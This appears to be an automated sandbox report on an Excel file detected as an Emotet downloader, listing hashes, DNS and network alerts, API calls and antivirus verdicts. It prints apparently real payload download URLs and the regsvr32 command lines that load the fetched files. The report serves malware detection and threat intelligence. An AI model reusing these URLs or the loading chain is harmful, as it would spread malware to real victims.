Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 8, 2023, 1:58 p.m.	March 8, 2023, 2:01 p.m.

Size	255.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Sun Nov 6 17:53:39 2022, Security: 0
MD5	`893f9b10a48073fc3fa0d5c8867f7200`
SHA256	`1c5f2ca9839078742383b207721ce92fdfa70ac50e5d7b73c2488d47f7e5ebac`
CRC32	`925E90AC`
ssdeep	`6144:6Kpb8rGYrMPe3q7Q0XV5xtuEsi8/dgVNiwrfx9rNFMMrttRzV5Dz3UxqC8LUcST:5NbDjP9XH5XIqZLnST`
Yara	Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader Microsoft_Office_File_Zero - Microsoft Office File

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.27 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.57	96.16.99.43
clanbaker.org	A 208.87.225.118	208.87.225.118
cs.com.sg	A 103.237.169.99	103.237.169.99
atici.net
j2ccamionmagasin.fr	A 152.228.216.255	152.228.216.255

Flow	SID	Signature	Category
TCP 192.168.56.103:49167 -> 152.228.216.255:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 152.228.216.255:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49162 -> 103.237.169.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 152.228.216.255:443 -> 192.168.56.103:49168	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49162 103.237.169.99:443	C=US, O=Let's Encrypt, CN=R3	CN=cs.com.sg	35:f9:b3:54:db:e1:bd:7b:fa:18:f4:fd:95:0b:18:ab:fd:d7:c0:c8

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://clanbaker.org/css/khhl7kT2n69n/

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 8, 2023, 1:58 p.m.	process_identifier: 1440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c318000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory March 8, 2023, 1:59 p.m.	process_identifier: 1440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6be02000 process_handle: 0xffffffff	1	0	0

cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 8, 2023, 1:58 p.m.	process_identifier: 1440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Time & API	Arguments	Return
URLDownloadToFileW March 8, 2023, 1:58 p.m.	url: https://cs.com.sg/Backup/Bk778kXNKMiH5vH/ stack_pivoted: 0 filepath_r: ..\oxnv1.ooccxx filepath: C:\Users\test22\oxnv1.ooccxx	2148270105
URLDownloadToFileW March 8, 2023, 1:59 p.m.	url: https://j2ccamionmagasin.fr/css/1Mp8y/ stack_pivoted: 0 filepath_r: ..\oxnv2.ooccxx filepath: C:\Users\test22\oxnv2.ooccxx	2148270085
URLDownloadToFileW March 8, 2023, 1:59 p.m.	url: http://atici.net/old/PkZI74DD/ stack_pivoted: 0 filepath_r: ..\oxnv3.ooccxx filepath: C:\Users\test22\oxnv3.ooccxx	2148270085
URLDownloadToFileW March 8, 2023, 1:59 p.m.	url: http://clanbaker.org/css/khhl7kT2n69n/ stack_pivoted: 0 filepath_r: ..\oxnv4.ooccxx filepath: C:\Users\test22\oxnv4.ooccxx	2148270086

parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx

Lionic	Trojan.MSExcel.Emotet.4!c
MicroWorld-eScan	XLM.Formulas.Abracadabra.8.Gen
ClamAV	Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0
FireEye	XLM.Formulas.Abracadabra.8.Gen
CAT-QuickHeal	Trojan.XLM4.Emotet.47213
McAfee	W97M/Downloader.dwl
VIPRE	XLM.Formulas.Abracadabra.8.Gen
Sangfor	Malware.Generic-XLM.Save.Emotet_ma29
K7AntiVirus	Trojan ( 0059086a1 )
K7GW	Trojan ( 0059086a1 )
Arcabit	XLM.Formulas.Abracadabra.8.Gen
VirIT	X97M.Emotet.DMG
Cyren	XF/Emotet.E.gen!Eldorado
Symantec	CL.Suspexec!gen128
ESET-NOD32	DOC/TrojanDownloader.Agent.DOV
TrendMicro-HouseCall	Trojan.XF.EMOTET.YJCKH
Avast	VBS:Malware-gen
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.MSOffice.Generic
BitDefender	XLM.Formulas.Abracadabra.8.Gen
Tencent	Trojan.MsOffice.Macro40.11025283
Sophos	Troj/DocDl-AGRX
F-Secure	Malware.XF/Agent.B2
DrWeb	Exploit.Siggen3.38056
TrendMicro	Trojan.XF.EMOTET.YJCKH
McAfee-GW-Edition	W97M/Downloader.dwl
Emsisoft	XLM.Formulas.Abracadabra.8.Gen (B)
Avira	XF/Agent.B2
Antiy-AVL	Trojan[Downloader]/MSExcel.Agent.dov
Microsoft	Trojan:O97M/Emotet.SM!MTB
ViRobot	X97M.S.Downloader.261120.B
ZoneAlarm	HEUR:Trojan.MSOffice.Generic
GData	Macro.Trojan-Downloader.EmoAgent.A
Google	Detected
AhnLab-V3	Downloader/XLS.XlmMacro.S1947
ALYac	Trojan.Downloader.XLS.Gen
MAX	malware (ai score=100)
VBA32	TrojanDownloader.O97M.Emotet.DD
Zoner	Probably Heur.W97ShellB
Rising	Downloader.Agent/XLM!1.DE99 (CLASSIC)
Ikarus	Trojan-Downloader.XLM.Agent
Fortinet	MSExcel/Agent.DKF!tr.dldr
AVG	VBS:Malware-gen

Documento.xls